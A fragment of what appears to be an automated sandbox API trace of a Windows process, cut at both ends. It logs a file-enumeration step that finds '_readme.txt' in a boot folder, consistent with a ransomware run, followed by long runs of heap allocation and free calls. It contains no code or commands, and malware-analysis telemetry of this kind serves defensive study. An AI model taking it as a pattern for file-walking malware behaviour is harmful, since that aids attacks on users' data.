ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.188] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned=".txt" [0093.188] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34a3340, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.188] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0093.188] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.188] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.195] 